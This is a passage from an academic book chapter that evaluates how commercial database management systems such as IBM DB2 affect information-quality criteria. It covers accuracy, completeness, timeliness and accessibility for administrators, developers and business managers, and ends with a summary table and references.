well-designed DBMS. For instance, if data is generated and inserted into a DBMS in a timely manner, a good DBMS will not unduly delay the accessibility of the data to users. Another example is the completeness of information: DBMS are developed to always return complete (and correct) answers to queries. Only if the stored base data is incomplete or incorrect will a DBMS answer with an inferior result. In this spirit we analyze several quality dimensions and provide details on if and how a typical DBMS meets IQ demands. In this chapter we ignore the issue of software quality and assume a DBMS that correctly implements the SQL standard and its added functionality.
Structure of this Chapter In the following section we introduce IBM’s DB2 database system as a typical representative of commercial DBMS. Additionally, we present three different roles that DBMS users acquire, each with different needs towards information quality and each with different demands on a DBMS. In third section we enumerate a comprehensive set of information quality criteria and discuss for each, if and how a DBMS used in different roles affects them. We conclude with a discussion of future work in the fourth section and a summary of our findings in the last section.
Database Management Systems and Their Users A software product, such as a database management system (DBMS), is used by many different persons with different educational backgrounds, different IT needs, and, most importantly, with different roles inside an organization. These roles are the basis of our assessment of DBMS quality.
2141
Information Quality
DB2 Universal Database: A Typical, Off-the-Shelf Database Management System Figure 1 illustrates a layered DBMS architecture that has evolved over the past 30 years of relational database technology evolution and is typical of most DBMS products in the marketplace. Requests to the DBMS are formulated in a semantically rich, declarative language and submitted via a command line or programming interface. SQL (Structured Query Language, [ISO, 1999]) has developed as the standard language for manipulating relational data, and interfaces such as JDBC and ODBC have evolved as the standard programming APIs by which SQL requests are submitted to the DBMS. Graphical tools, packaged and custom applications submit SQL requests through these programming interfaces. The maturity and wide adoption of these standards ensures that a wide variety of documentation is available to describe their use.
A query processor sits below the DBMS interface layer and executes requests to store and retrieve data as efficiently and robustly as possible. The query processor is made up of multiple components that work together to transform a declarative request for data into a series of executable steps that satisfy the request. The top level component is the query parser, which relies on a lexical analyzer and parser to interpret the request and populate a data graph that captures the semantics of the request. This data graph is passed to a query optimizer that analyzes the graph and explores several strategies for answering the request, eventually choosing the most efficient plan according to some criteria, such as to minimize response time, throughput, or resource utilization. Once a plan has been selected, the code generator generates code to implement the plan. The runtime execution engine executes the code, interacting with a storage manager to retrieve and combine the appropriate data to fulfill the original request.
Figure 1. A generic DBMS architecture Graphical Tools
The query processor handles not only requests to retrieve data, but it also handles requests to insert, update and delete data in the database. Such operations may be performed concurrently by multiple users. System services such as transaction management, concurrency control, logging, and recovery, maintain the ACID properties of a database that enable a DBMS to safely support concurrent query, insert, update, and delete operations by multiple users. ACID stands for atomicity, consistency, isolation, and durability (for details beyond the following brief descriptions of the properties see Graefe, 1993). Atomicity refers to “all or nothing” behavior for database operations. Operations that must be logically performed together are grouped into transactions, and the DBMS provides transaction management services to ensure that either all or none of the operations of a transaction are performed in order to preserve a consistent view of data. For example, a bank transfer requires removing money from one account and adding it to another. The Atomicity property of the database ensures that if the operations are grouped together in a transaction, then a partial update — removing money from the first account without adding it to the second — will not occur. Consistency refers to maintaining a consistent view of the data in the database both internally and with respect to the applications that access the data. Consistency is enforced by a DBMS by the services that provide atomicity and isolation. A committed transaction takes a database from one consistent state to another consistent state. For example, the two bank accounts of the previous example are in a consistent state before a transfer occurs. During the execution of the transaction, the database is temporarily inconsistent when the money is removed from one account but not yet added to the second account. However, after the transaction commits, the two bank accounts are again in a consistent state, with money successfully transferred from the first account to the second account.
Isolation ensures that concurrent users of a database will execute their transactions in isolation, and not interfere with each other’s operations. For example, if Felix and Mary both initiate a transfer of funds for the same set of bank accounts, the DBMS’s locking and concurrency services ensure that either Felix’s transaction will execute to completion before Mary’s, or vice versa. Thus, Mary will not see Felix’s partial updates (e.g., the value of the account being transferred to), nor will Felix see Mary’s partial updates. Durability refers to the property that any transaction committed to the database will not be lost. Durability is maintained by the DBMS through logging and database recovery services. Logging records the state of database transactions, including whether they were committed, and database recovery restores a database to a consistent state in the event of a hardware or software failure. For example, when the transaction transferring money from one account to another is committed, the DBMS records enough information about the transaction, even in the event of a hardware failure. Many of the challenges in information quality arise when integrating data from many, autonomous sources. Duplicates appear when a real-world object is represented in more than one source, information is “tainted” when integrated with data from an untrustworthy source, and completeness can be increased through integration. Simultaneously, much DBMS vendors have paid great effort to introduce integrating capabilities into their base DBMS product. These capabilities appear as data warehousing environments, as federated database management systems, such as IBM’s Information Integrator, or as grid-enabled DBMS, such as Oracle’s 10g database. In fact, many of the integrating technologies have become fundamental components of the DBMS. Thus, in the following discussions we include DBMS integration technology whenever applicable to the IQ criterion at hand.
2143
Information Quality
Users that interact with a DBMS directly typically rely on two types of graphical tools. Such tools are either packaged with the database itself or produced by third party vendors. Administrative tools, such as DB2’s Control Center or Oracle’s Enterprise Manager are used to configure and maintain the database, including such tasks as defining database layout, governing user access to the data, monitoring performance, and scheduling backups to ensure the data is recoverable in the event of a failure. Application development tools, such as DB2 Development Center, Computer Associates Erwin Data Modeler, or Rational Rose, are used to create database artifacts that are used by applications, including such tasks as developing models of the data required for an application, or generating functions and stored procedures that encapsulate much of the data access logic for the application. In conclusion, large database vendors offer the same or similar base functionality, which is the focus of our research. We do mention DB2’s additional functionality that is particular to information quality improvement.
Roles of DBMS Customers An exhaustive analysis of DBMS use may identify a large population of DBMS users, each with distinct purposes and roles. Rather than address all of these roles, we focus our attention on three important DBMS customers (shown in Figure 2), each with different needs with respect to information quality and each with different means to improve IQ. •
Administrator: Database administrators are trained DBMS experts who install and maintain DBMS and accompanying tools. Their role is to manage the integrity, security, and overall performance of a DBMS system, including such tasks as scheduling backups and database reorganization activities, optimizing storage layout, tuning performance in response to application requirements, and managing user access to the data. Administrators often use the administrative graphical tools and command line interface shown in
Figure 2. Three roles for DBMS usage Administrator
Uses
Admin Tool
Developer
Uses
Business Manager
Creates
App Dev Tool
Uses
Application
DBMS Interface (SQL, ODBC, JDBC) DBMS Engine
Interprets
Maintains
Data
2144
Information Quality
•
•
Figure 1 to perform their tasks. Developer: Application developers create software to support a particular business need. An application developer works with a domain expert to define the application requirements, architect a solution, and implement application code to meet those requirements. The application is typically composed of distinct software components that encapsulate the logic for a particular aspect of the solution, and application developers specialize in component areas. For example, an application that produces a daily report of business transactions might be composed of a component that runs queries against the database to retrieve the day’s transaction information, a component that combines and summarizes the data according to specific business rules, and a Web-based interface that formats the information in an easy-to-read format. Application developers typically use application development tools and the programming interface illustrated in Figure 1 to implement their applications. Business Manager: A business manager relies on applications developed by application developers in order to make robust business decisions. The health and robustness of the database and the applications built on top are critical to the line of business; success and profitability often depend on the reliability and quality information produced by the applications. If a DBMS that stores order information is unavailable for several hours, business transactions cannot occur, and the business loses revenue. If data is corrupted by the DBMS or if information is computed incorrectly, the business may be subject to fines or penalties.
THE QUALITY OF DATABASE MANAGEMENT SYSTEMS We analyze a set of information quality criteria from the perspective of the three distinct customer roles described above. There have been many attempts to collect and classify IQ criteria, most notably the empirical study of Wang and Strong (1996), in which the authors aggregated survey results to find a list of 15 IQ criteria. Here, the IQ criteria are ordered according to that classification, but we extended the set at appropriate places by several criteria that are of particular importance to DBMS users (and at which DBMS excel). For convenience, we quote the definitions of Wang and Strong (1996).
Intrinsic IQ Criteria Believability “Believability is the extent to which data are accepted or regarded as true, real, and credible” (Wang, 1996). In a sense, believability is the expected accuracy. Due to the ACID properties described earlier, DBMS faithfully report data as it was entered into the database. A main source for doubts in the accuracy of data is the difficult formulation of complex SQL queries. Thus, managers must rely on the ability of developers to correctly write and document queries that have the desired semantics. Research has developed methods to automatically detect dubious queries and subqueries and issue warnings to the developer (Brass, 2002). For instance, some queries always produce empty results because they contain mutually exclusive filtering predicates. Such techniques have not yet found their way into commercial DBMS. However, given high quality data and a correct query (i.e., a query that reflects the semantics of the application), the produced query result is guaranteed to be correct. Through the very good
2145
Information Quality
track record of DBMS, developers and managers worldwide nowadays entrust DBMS with even their most business-critical data, proving a strong belief that DBMS will correctly produce and transform the data that is stored within.
Accuracy “Accuracy is the extent to which data are correct, reliable, and certified free of error” (Wang, 1996). It is typically determined as the quotient of the number of correct values in a database and the overall number of values in the database. With respect to the data as it is accessible, a DBMS always provides accurate answers to a query (in terms of DBMS, this property is called correctness). This IQ criterion best exemplifies the quality-in-quality-out principle of DBMSs. Correctness, and thus accuracy, is ensured by the use of checksums, locks and other methods of transaction processing. In particular, DBMS provide durability (the D in ACID), so that no data is lost. Since the main goal of a DBMS is to store data faithfully, vendors take great care to ensure the accurate insertion of data and the precise delivery of that data in response to queries. General DBMS have no means to automatically correct inaccurate data. They do however provide some means to detect inaccurate data: Through the usage of pre-defined and user-defined types (UDTs), a DBMS verifies if a data value conforms to the syntactic definition of its type. Furthermore, administrators can implement triggers that perform certain actions and issue warnings when a possibly incorrect value, such as an outlier, is inserted into the database.
Objectivity “Objectivity is the extent to which data are unbiased, unprejudiced, and impartial” (Wang, 1996). It is trivial to show that DBMS have perfect objectivity: The durability property of DBMS ensures that data entered into a database
2146
is not changed. Since DBMS are fully automatic machines and software, they are not prejudiced and are always impartial.
Reputation “Reputation is the extent to which data are trusted or highly regarded in terms of their source or content” (Wang, 1996). Arguments similar to those for the Objectivity criterion also hold with respect to the reputation a DBMS conveys. In fact, there are occasions when the reputation of the DBMS increases the reputation of the data stored within. Major DBMS vendors, such as IBM, Oracle, and Sybase, have successfully marketed mature DBMS products for many years and have thus gained a high reputation. It should be noted that much of this reputation stems not from the quality of the data stored inside, but from ease of use, ease of maintenance, and marketing. IT managers have a tendency to trust data coming from a reputed DBMS more than from other lessrenown IT products.
Contextual IQ Criteria Value-Added “Value-Added is the extent to which data are beneficial and provides advantages from their use” (Wang, 1996). Apart from simply storing data and retrieving data upon request, modern DBMS have many capabilities to add value to data. In Wiederhold (1997) the authors provide a list of features that DBMS (and in particular federated DBMS) may provide to add value to the base data. These features include simple aggregation of data, which most every DBMS is able to provide, search capabilities (such as those provided by DB2 Net Extender) to allow key-word searching, triggers to automatically react to certain events, etc. Many of the features listed there are directly provided by DBMS. For the rest, DBMS have standard interfaces so that
Information Quality
third-party vendors can implement appropriate business intelligence applications on top of the DBMS. IBM’s Information Integrator provides the ability to integrate multiple information sources within a single federated system, thereby directly providing value through integration, and indirectly through various capabilities for federated systems.
Relevancy “Relevancy (or relevance) is the extent to which data are applicable and helpful for the task at hand” (Wang, 1996). DBMS can improve relevancy of data in with two techniques: the ability to declaratively select appropriate data and thus avoid redundant or irrelevant data, and the ability to access additional, remote data. Using the declarative SQL language, developers can implement pre-defined views that select and filter data according to the application and according to the needs of the business manager consuming the data. SQL views can limit the set of columns of a data set exported and can limit the rows of the data set according to some filter predicates. Using technology to federate multiple, heterogeneous and remote data sources, federated DBMS, such as IBM’s Information Integrator, are able to greatly increase the amount of data accessible to the developer. Thus, developers are given more freedom to include relevant sources and improve relevancy (and completeness) in the final, integrated result: The percentage of relevant data compared to all available data can be increased.
Timeliness “Timeliness is the extent to which the age of the data is appropriate for the task at hand” (Wang, 1996). Commercial DBMS provide several means to optimize the timeliness of data. At the database core level, DBMS ensure timeliness by making
updates to the data visible immediately after the updating transaction is completed. High timeliness is jeopardized when same data is stored at multiple locations and then updated at only one location. Only after such updates are propagated to the other copies is the data once again up-todate. Unfortunately, DBMS frequently duplicate data to ensure high response times. For instance, data accessed by a remote client is often cached at the client side. Another example is the deliberate replication of data at multiple clients. Finally, materialized views store pre-calculated query results from base data. In all cases, updates to the base data are not immediately reflected in the copies. To improve timeliness, DBMS have implemented different schemes of update propagation, such as those available with DB2 Information Integrator Replication Server. Such replication offerings often support flexible latency characteristics for update propagation (continuous, event-driven, or scheduled), as well as transaction-consistent and table-at-a-time replication. Finally, there has been much applied research on the so-called view-update problem (Lehner, 2000).
Completeness “Completeness is the extent to which data are of sufficient breadth, depth, and scope for the task at hand” (Wang, 1996). Usually, completeness can be measured as the number of records in a database, assuming that larger numbers are of higher utility (breadth). In Naumann (2004), we introduce a completeness definition that also accounts for the number of attributes of records and the number of (useless) null-values in database. The arguments to support our claim that completeness is well-accounted for by DBMS are similar to the ones for the accuracy criterion. In a sense, completeness is built-in in databases, and with respect to the data as it is accessible a DBMS always provides complete answers to a query. It must be noted that this interpretation
2147
Information Quality
of completeness relates to the data stored in the database and not to the data that is necessary or relevant for the application at hand. Completeness is of great importance and particular difficulty when integrating multiple data sources. All modern DBMS provide flexible means to access remote data sources, either by supporting extract-transform-load (ETL) processes to fill data warehouses (materialized integration) or by providing federated access to remote sources at query time (virtual integration). Many ETL vendors, such as Ascential Datastage or Oracle Warehouse Builder supply advanced ETL tools that unburden administrators from programming individual transformations and instead allow them to concentrate on the high-level definition of entire transformation processes. For virtual integration, extensive tooling exists to define so-called wrappers, which automatically translate and distribute queries to appropriate remote sources. The ability of wrappers to access sources of many different types and flavors (XML, Excel, flat files, other DBMS, Web services, etc.) help administrators improve completeness by wrapping all sources relevant to a particular domain (see for instance the DB2 XML Wrapper in Josifovski (2003a) and a tool to easily create one in Josifovski (2003b). For example, consider a typical insurance claim, which may include account information stored in a relational database, photographs stored in a content management system, and a police report received as an XML document. Virtual integration enables the insurance application to view all of this data as though it were stored and queried through a single interface.
Appropriate Amount of Data “Appropriate amount of data is the extent to which the quantity or volume of available data is appropriate” (Wang, 1996). While selecting the set and amount of data that is just right for the task at hand is a difficult problem, DBMS help developers achieve this goal in two ways.
2148
First, DBMS provide means to explicitly limit the amount of data returned through SQL extensions such as “FETCH FIRST N ROWS ONLY” in DB2 (for Microsoft SQL Server: “SELECT TOP N ... FROM ...” and for Oracle: “OPTIMIZER_MODE = FIRST_ROWS_N”). With this command the DBMS limits the number of rows returned to the data consumer. The technique improves latency (see below), addresses problems of limited bandwidth, and avoids users being overwhelmed by too much data. Second, commercial DBMS place virtually no limit on the amount of data they can manage. The Winter Corporation lists some of the largest known database instances by different criteria, such as number of rows, size in Bytes, and so forth. (2003). According to that survey, the largest databases store close to 100 Terabytes of data and up to ½ trillion rows. In summary, large DBMS support appropriate amounts of data by providing capabilities to reduce the amount as much as desired and simultaneously allow the amount to be as large as necessary.
Latency and Response Time (New Criteria) Latency is the amount of time from issuing the query until the first data item reaches the user. Latency is particularly important for end-users such as business managers. Instead of waiting for the DBMS to calculate the entire result of a query or to produce all pages of a report, modern DBMS have the ability to “fast-track” first results. Thus, users can browse the first part of a result. Further parts are either calculated on demand (saving execution cost if they are never needed) or calculated in the background (i.e., while displaying first results). The most important technique to ensure good (low) latency is that of pipelined query execution. Data is sent through an execution pipeline, so that calculated results arrive at the user’s application even while base-data is still being read (Graefe,
Information Quality
1993; and (Pirahesh, 1990). All modern DBMS are able to recognize a potential for pipelines for a given query and are able to execute the query in pipelined mode. Developers of applications are able to use certain functions, so that the applications also profit from low latency of the DBMS. For instance the getNext( ) function explicitly produces only the next subset of answers. Administrators can use DB2’s SQL extension “FETCH FIRST N ROWS ONLY” to achieve low latency and also decrease query execution cost. While latency measures the time until a first part of a response reaches the data consumer, response time measures the delay in seconds between submission of a query by the user and reception of the complete response from the DBMS. Response time is the main and often sole criterion for traditional database optimizers. In consequence there has been an enormous amount of academic and industrial research to improve response time of queries even over very large databases, much of which has been implemented in commercial DBMS. For lack of space, we refer the reader to surveys for query optimization for centralized databases (Graefe, 1993) and for distributed databases (Kossmann, 2000). While many of these optimization techniques must be installed and maintained by hand, recent work on autonomic computing lifts the burden of DBMS administrators. Automatic advisors, such as the Design Advisor of IBM DB2 Stinger, recommend optimal settings for many DBMS parameters, for instance regarding the use of indices and the use of materialized views (Zilio, 2004).
Representational IQ Criteria Interpretability “Interpretability is the extent to which data are in appropriate language and units and the data definitions are clear” (Wang, 1996). Interpretability is highly dependent on the interface that users have to the data. DBMS interfaces have two roles. One
role is to interpret given data using metadata, such as the schema, constraints, etc. The other role of interfaces is to allow users interaction with the data, such as creating new data, reformatting data, and aggregating data. Interpretation of data largely depends on the underlying schema, which can be well or poorly designed. DBMS support good schema design through visual tools, such as Computer Associate’s ERWin Data Modeler. Also, DBMS provide multiple language support to improve interpretability. The main tools around DB2 are available in 15 different languages. Recent developments have given administrators and programmers more flexibility in schema design: Table and attribute names are no longer restricted to eight bytes, and user defined types (UDTs), user-defined functions (UDFs), and table functions allow development of specialized data items. Interfaces for interaction with the data in a DBMS range from highly technical interfaces (SQL Query Language) to somewhat technical interfaces (query- and view-building tools, such as DB2 SQL Assist) to non-technical interfaces for business managers (report generators).
Understandability “Understandability (or ease of understanding) is the extent to which data are clear without ambiguity and easily comprehended” (Wang, 1996). Thus, understandability measures how well a DBMS presents its data, so that the user is able to comprehend its semantic value. Standard DBMS query interfaces represent data in simple tables, using column names stored in the system catalog. Until several years ago, column names were restricted to eight characters in length, severely limiting the expressivity and thus understandability of the data. This has now changed and developers can give tables and columns more verbose names. Also, many third-party applications specialize in visualizing complex data.
2149
Information Quality
One of the main concerns of DBMS administrators is to maintain efficient query response times to all queries. In particular, administrators are concerned with optimization of queries (i.e., finding an efficient execution strategy). DB2 provides an advanced visualization tool called Visual Explain, which graphically displays a query execution plan along with table sizes, join algorithms, filter selectivity and result size. Such visualization improves understanding of the data and the DBMS view of the data. Visualization of query result data itself is not the focus of the DBMS, but rather of applications built on top. In consequence, business managers are rarely exposed to a simple tabular display of data directly from the DBMS, but instead use sophisticated tools that are able to additionally visualize data in other models, such as bar charts that more accurately reflects the business domain.
Representational Consistency “Representational consistency is the extent to which data are always represented in the same format and are compatible with previous data” (Wang, 1996). Representational consistency from an administrator’s point of view is accomplished through DBMS support of standard data exchange protocols, such as JDBC and ODBC, and standard data exchange formats, such as CSV (comma separated lists) and XML (Extensible Markup Language). These standards, which are supported by all DBMS vendors, allow fairly easy data exchange at the byte level among different data sources. Achieving representational consistency in terms of the structure of the data as reflected in a schema is a far more difficult task. Two main research areas have dealt with the integration of heterogeneously modeled data: schema integration (see for instance Batini, 1986) and schema mapping (see for instance Hernandez, 2002).
2150
While schema integration attempts to generate a new integrated schema from different representations, schema mapping simply represents correspondences among heterogeneous schemas. The correspondences are then interpreted as data transformations that help achieve representational consistency among multiple data sources. Unfortunately, both approaches are not yet well supported in commercial DBMS. However, several prototypical tools with graphical interfaces for schema mapping are under development by vendors such as Clio at IBM Research (Hernandez, 2002) and Rondo (Melnik, 2003). To conclude, achieving representational consistency is an extremely difficult task not yet well supported by DBMS and research towards semiautomatically solving it is only now underway.
Representational Conciseness “Representational conciseness is the extent to which data are compactly represented without being overwhelming” (Wang, 1996). Data representation in most modern DBMS follows the relational model, which structures data into relations (tables) storing tuples (records) each having a set of attributes (stored in columns) (Codd, 1970). For many applications this is an intuitive and compact method to model data. In particular, through the process of normalizing tables, the representation can be rendered as compact as possible. On the other hand, many applications have a more hierarchical view of data, so that an XML data model might be preferred. Most modern DBMS have some capability of storing and retrieving XML data, or even producing XML data from a set of tables through the new SQL/XML standard.4 As already argued for the Relevancy criterion, DBMS provide many means for developers to reduce the amount of data to some relevant and concise subset as needed for any particular application. Reduction is achieved by selecting
Information Quality
relevant columns (called projection), filtering relevant rows (called selection), and summarizing data (aggregation).
Accessibility IQ Criteria Accessibility/Availability “Accessibility is the extent to which data are available or easily and quickly retrievable” (Wang, 1996). Availability of a DBMS is the probability that a feasible query is correctly answered in a given time range. Availability is a technical measure concerning both hardware, software, and their compatibility. Availability and accessibility are crucial features for large scale, mission-critical applications. For example, a DBMS server failure in the middle of a time-sensitive stock transaction or bank transfer could have an immediate effect on the core business. DBMS have invested heavily in technology to achieve high availability. Centralized DBMS running on a single server have advanced in recent years to parallel DBMS and distributed DBMS running on multiple servers possibly distributed worldwide. Distribution opens the possibility of two means to achieve high availability: clustering and replication (Wright, 2003). Both clustering and replication exploit distribution to minimize the risk that DBMS software or hardware introduces as a single point of failure for applications that depend on the DBMS. DBMS clusters exploit features in the operating system on which the DBMS is deployed to automatically react to software or hardware failures. In the event of a failure, the DBMS cluster automatically engages a backup system to take over for the failed component. DBMS cluster technology achieves high availability for an entire DBMS system. It requires specific software and hardware to implement, and places restrictions on the distance and hardware over which it can be deployed. DBMS replication is an alternative technology for high availability. Replication allows an administrator
to control the subset of data to be managed for availability, including what subset of the data to replicate, where to place replicas (including across platforms and over long distances), how to keep them up-to-date, and which replica to use to answer a particular query (Bourbonnais, 2004). DB2 Information Integrator Masala Replication Server, for example, supports multiple source/ target topologies for replication, including 1-tomany, many-to-1, and many-to-many. In addition to high availability features, DBMS provide a number of features to support user accessibility to the data managed by the DBMS. As shown in Figure 1, DBMS provide a number of different interfaces from visual to programming APIs to access data. Most standard DBMS APIs such as ODBC are fairly mature. However, DBMS vendors tend to keep up with current trends and technologies. For example, most DBMS vendors have developed tools to allow administration and user access to DBMS via a Web interface in a browser. Examples include IBM’s DB2 Web Query Tool, Oracle’s Application Server Portal, and Microsoft’s SQL Server Web Data Administrator. In addition to flexibility with regard to interfaces, DBMS also provide features that allow administrators to customize user accessibility to data. Examples of such features include user authentication, object-level privileges, database views, and tools like DB2 Query Patroller that regulate database resource use by user-type. To summarize, DBMS provide a number of built-in availability and accessibility features to provide reliable access to data at the time it is needed by the applications and users that depend on it.
Access Security “Security is the extent to which access to data can be restricted and hence kept secure” (Wang, 1996). Security covers technical aspects, such as cryptography, secure login and so forth, but also includes the possibility of anonymization of the
2151
Information Quality
user and authentication of the DBMS by a trusted organization. Modern DBMS feature several abilities to ensure high security. First, the SQL standard specifies commands to GRANT and REVOKE detailed privileges to individual data objects, such as tables, views, functions, and so forth. Second, DBMS implement sophisticated authentication policies at servers and clients. Finally, DBMS vendors usually provide entire security tool suites ranging from security auditing and monitoring, intrusion detection, to privacy and security management tools.
Customer Support and Documentation (New Criterion) Customer support is the amount and usefulness of human help provided to users either electronically or personally. Documentation is the amount and usefulness of (electronic) documents describing the DBMS and its functionalities and guiding customers during system deployment and application development. Business managers are usually not confronted with the DBMS themselves, but rather with applications on top, for which there exist separate support systems and documentation. Administrators and developers: Large installations of DBMS are usually accompanied by agreements on technical support. The degree of support is available at different levels and costs. In addition to this explicit and contractually agreed-upon assistance, all vendors supply a multitude of resources to guide users. Questions to dedicated newsgroups are answered by experts; context-sensitive help systems are provided within the DBMS and online. Detailed documentation (IBM’s Redbooks), tutorials, technical articles, white papers are available for download, user conferences, such as the International DB2 User Group conference (IDUG), are held regularly throughout the world, and reference implementations to common tasks are available for download, etc. In summary, customer support and documen-
2152
tation can be considered good, in particular for DBMS of large vendors.
FUTURE TRENDS Many research papers have proposed to include data quality dimensions into the data model itself. Typically, extensions to the relational model are proposed. Wang and Madnick present the Polygen framework, which extends each data value with metadata about its origin (1990). The authors suggest how to extend operators of the relational algebra, necessary to manipulate and query the data, to accommodate and update the corresponding metadata. In a further extension of their work they allow for information quality metadata of many dimensions (1995). Again, the relational algebra is adjusted. More recently, Scannapieco proposed a similar extension to the XML data model (2004). Even more recently Widom has reiterated the importance of incorporating information quality aspects and proposed the Trio System, which includes accuracy and lineage information in the relational data model (2005). These and other projects have in common that they are merely suggestions or prototypical implementations at best and have not yet been implemented by major database management system vendors. A second trend is the development of tools — most notably ETL tools — that are based on DBMS and enhance information quality. Such tools are mentioned throughout the chapter wherever applicable.
CONCLUSION AND DISCUSSION In conclusion, DBMS are able to uphold the quality-in-quality-out principle postulated in this chapter. Table 1 summarizes our results by listing the most important techniques to uphold a qual-
Information Quality
Table 1. Summarizing effects of DBMS on IQ IQ Criterion
Intrinsic DBMS capabilities
Believability
ACID properties
Accuracy
ACID, UDTs, Triggers, checksums
Objectivity
Durability, “unbiased” machine
Reputation
Extended DBMS Features
Summary
% Outlier detection
% %
Maturity of DBMS, reputation of DBMS
+
Value Added
Aggregation
Federation, integration, search, etc.
+
Relevancy
Powerful query language
Access to remote data
+
Timeliness
Update propagation for materialized views and replication
Completeness
ACID properties
ETL, Wrappers for heterogeneous data
+
Approximate Amount
Scalability to many Terabyte
First N Rows
%
Latency/ Response Time
Pipelining, advanced query optimization
First N Rows, autonomic computing
+
Interpretability
Language support, UDTs, UDFs
Visual schema design, query builders
+
Understandability Metadata restrictions (8 char)
Query plan explanation for administrators, visualization tools on top of DBMS
–
Repr. Consistency JDBC, relational data model
XML, schema integration tools, schema mapping
%
+/–
Repr. Conciseness
Relational data model, normalization, query language
SQL/XML
+
Accessibility
Distribution, replication
Web interfaces, portals
+
Security
SQL privilege management, authentication
Security auditing
+
Phone and email support, tutorials, manuals, conferences, newsgroups
+
Support/ Documentation
Note: – detrimental; % no effect; + beneficial
2153
Information Quality
ity level or to improve the information quality in criterion. We have distinguished features that are intrinsic or fundamental to relational databases and features that are common extensions to RDBMS distributions. The IQ advantages of the first set of features (“intrinsic DBMS capabilities”) are automatic when using carefully and expertly configure databases. The advantages of the second set of features (“extended DBMS features”) are common with most commercial DBMS but are tools that must be actively applied in order to achieve high quality data. In several cases, DBMS are able to improve on the quality of the data within. Most notably, DBMS add value to data by providing many advanced value-adding services, such as aggregation, integration, etc., as mentioned by Wiederhold and Genesereth (1997). The powerful SQL query language supported by all DBMS and the vendor-specific extensions allow developers to manipulate data in many ways to enhance its quality: Selection and projections allows users to limit data to just the right subset improving relevancy, appropriate amount and response time. Tools at the metadata level, such as schema design and integration tools, improve representational consistency and conciseness, understandability and interpretability. Through their support of the ACID properties, algorithms at the database core ensure that data is not lost or tampered with, upholding criteria such as accuracy, completeness, and believability. The ability of DBMS to integrate data from multiple heterogeneous sources also improves completeness and relevancy of data. Finally, many usability tools to maintain and use DBMS improve security, support, and accessibility. The only detriment to information quality imposed by the use of DBMS is the potentially limiting expressiveness of the relational model. DBMS data is modeled in relations using a set of attributes, while often a hierarchical or other model is the more natural way of expressing the structure of data. With the recent move of major
2154
DBMS towards support of the XML data model and the XQuery language, this disadvantage is already fading. To summarize, it should come as no surprise that relational databases are able to uphold the quality-in-quality-out criteria described in this chapter. DBMS technology has matured over 20 years of development, and confidence in the reliability and robustness of the DBMS model is reflected in countless mission-critical applications deployed on DBMS systems today. The proactive improvement of information quality however must be left to improved processes, specialists and specialized applications.
REFERENCES Astrahan, M. M., Blasgen, M. W., Chamberlin, D. D., Gray, J., King III, W. F., Lindsay, B. G., et al. (1979). System R: A relational data base management system. IEEE Computer, 12(5), 42-48. Batini, C., Lenzerini, M., & Navathe, S. B. (1986). A comparative analysis of methodologies for database schema integration. ACM Computing Surveys, 18(4), 323-364. Bourbonnais, S., Gogate, V., Haas, L., Horman, R., Malaika, S., Narang, I., et al. (2004). An information infrastructure for the grid providing data virtualization and distribution. IBM Systems Journal, 43(4). Brass, S. (2002). Semantic errors in SQL. In Proceedings of the GI Workshop Grundlagen von Datenbanken, Fischland, Germany. Codd, E. F. (1970). A relational model of data for large shared data banks. Communications of the ACM, 13(6), 377-387. Delone, W. H., & McLean, E. R. (1992). Information systems success: The quest for the dependent variable. Information Systems Research, 3(1), 60-95.
Information Quality
Graefe, G. (1993). Query evaluation techniques for large databases. ACM Computing Surveys, 25(2), 73-170. Hernández, M. A., Popa, L., Velegrakis, Y., Miller, R. J., Naumann, F., & Ho, H. (2002). Mapping XML and relational schemas with Clio. In Proceedings of the International Conference on Data Engineering (ICDE) (pp. 498-499). International Standards Organization (ISO). (1999). Information technology — Database Language SQL (Standard No. ISO/IEC 9075:1999). Josifovski, V., Massmann, S., & Naumann, F. (2003). Super-fast XML Wrapper generation in DB2: A demonstration. In Proceedings of the International Conference on Data Engineering (ICDE) (pp. 756-758). Josifovski, V., & Schwarz, P. M. (2003). Querying XML data sources in DB2: The XML Wrapper. In Proceedings of the International Conference on Data Engineering (ICDE) (pp. 809-820). Kossmann, D. (2000). The state of the art in distributed query processing. ACM Computing Surveys, 32(4), 422-469. Lehner, W., Sidle, R., Pirahesh, H., & Cochrane, H. (2000). Maintenance of automatic summary tables. In Proceeding of the SIGMOD Conference (pp. 512-513). Melnik, S., Rahm, E., & Bernstein, P. A. (2003). Rondo: A programming platform for generic model management. In Proceedings of the SIGMOD Conference (pp. 193-204).
tributed Systems (DPDS) (pp. 4-29). Scannapieco, M., Virgillito, A., Marchetti, C., Mecella, M., & Baldoni, R. (2004). The DaQuinCIS architecture: A platform for exchanging and improving data quality in cooperative information systems. Information Systems, 29(7), 551-582. Tayi, G. K., & Ballou, D. P. (1998). Examining data quality. Communications of the ACM, 41(2), 54-57. Wang, R., & Madnick, S. (1990). A Polygen Model for Heterogeneous Database Systems: The Source Tagging Perspective. Proceedings of the 16th VLDB Conference, (pp. 519-538), Brisbane, Australia. Wang, R., Storey, V., & Firth, C. (1995). A framework for analysis of data quality research. IEEE Transactions on Knowledge and Data Engineering (TKDE), 7(4), 623-640. Wang, R. Y., & Strong, D. M. (1996). Beyond accuracy: What data quality means to data consumers. Journal on Management of Information Systems, 12(4), 5-34. Widom, J. (2005). Trio: A system for integrated management of data, accuracy, and lineage. In 2nd Biennial Conference on Innovative Data Systems Research, Asilomar, CA. Retrieved from http:// www-db.cs.wisc.edu/cidr Wiederhold, G., & Genesereth, M. R. (1997). The conceptual basis for mediation services. IEEE Expert, 12(5), 38-47.
Naumann, F., Freytag, J. C., & Leser, U. (2004). Completeness of information sources. In Information Systems. Elsevier.
Winter Corporation. (2003). The TopTen program. Retrieved from http://www.wintercorp. com/VLDB/2003_TopTen_Survey/TopTenProgram.html
Pirahesh, H., Mohan, C., Cheng, J. M., Liu, T. S., & Selinger, P. G. (1990). Parallelism in relational data base systems: Architectural issues and design approaches. In Proceedings of the International Symposium on Databases in Parallel and Dis-
Wright, M. (2003). An overview of high availability and disaster recovery features for DB2 UDB. IBM Developerworks. Retrieved from http://www.ibm.com/developerworks/db2/library/techarticle/0304wright/0304wright.html
2155
Information Quality
Zilio, D. C., Zuzarte, C., Lightstone, S., Ma, W., Lohman, G. M., Cochrane, R., et al. (2004). Recommending materialized views and indexes with IBM DB2 Design Advisor. In Proceedings of the International Conference on Autonomic Computing (pp. 180-188).
•
or both. Other company, product or service names may be trademarks or service marks of others.
ENDNOTES TRADEMARKS
1
•
2
•
